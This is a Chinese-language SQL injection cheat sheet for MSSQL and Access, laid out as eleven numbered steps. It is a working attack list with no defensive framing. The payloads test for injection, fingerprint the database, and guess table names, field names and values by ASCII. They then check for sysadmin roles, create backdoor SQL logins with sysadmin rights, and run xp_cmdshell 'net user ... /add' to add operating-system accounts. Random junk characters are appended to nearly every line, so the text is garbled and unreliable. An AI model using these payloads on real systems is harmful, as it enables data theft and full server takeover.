1.判断是否有注入;and 1=1 ;and 1=2 LYaZ1*
2.初步判断是否是mssql ;and user>0 ^`)) C;
Ipq"E
3.注入参数是字符'and [查询条件] and ''=' uFPF!Ern
8p@Piy{p
4.搜索时没过滤参数的'and [查询条件] and '%25'=' [g:$K5\64
/M3Y~l$
5.判断数据库系统 /qy-qUh3h
pJt,9e6
;and (select count(*) from sysobjects)>0 mssql JSTuXW
.2v_H5<
;and (select count(*) from msysobjects)>0 access y6[If cN
"F.;Dv9V[0
.R./0Ot tx
v,4pp@8rv
6.猜数据库 ;and (select Count(*) from [数据库名])>0 <F`>,Pm
G}:lzOlMH
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 m6[0Kws&
Od%"B\
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 O0pDd4)"
49dd5ddr
9.(1)猜字段的ascii值(access) b#hDHSdZ,
lMg+R<$~I
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 j+["JXy
F=a<~EpZ
(2)猜字段的ascii值(mssql) }A7j/uy}s
iTAx=SG
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Htgx`N|
2VE9}%i
10.测试权限结构(mssql) G
%Q^o5m
~nG(5:A5g/
S>]pRV9rT
t_qNq{
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ]A<~XIu
1r]IogI
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ;bLEL"x%
WzF !6n!h
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- h9Y%{v
$l|qk z
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- HLZ;8/|48m
U~j
^I^
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 0QOBL'{7)
@)4]b+8Z
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- .b6VQCS~9
s#tZg
;and 1=(select IS_MEMBER('db_owner'));-- YtfVD7m
oze&
k+8q{5>A<
8'4S8DM
11.添加mssql和系统的帐户 }` ! =
m
JAX*hGhkh
;exec master.dbo.sp_addlogin username;-- a8 mVFm
;exec master.dbo.sp_password null,username,password;-- ?`#/ 8PN
,}))u0q+:
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Hr]h
Jc
!Y\D?rKZ
;exec master.dbo.xp_cmdshell 'net user username password ~ y;6W0x
26k LhFS
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 52,m:EhL
0 SNIYkGE
;exec master.dbo.xp_cmdshell 'net user username password /add';-- I{*<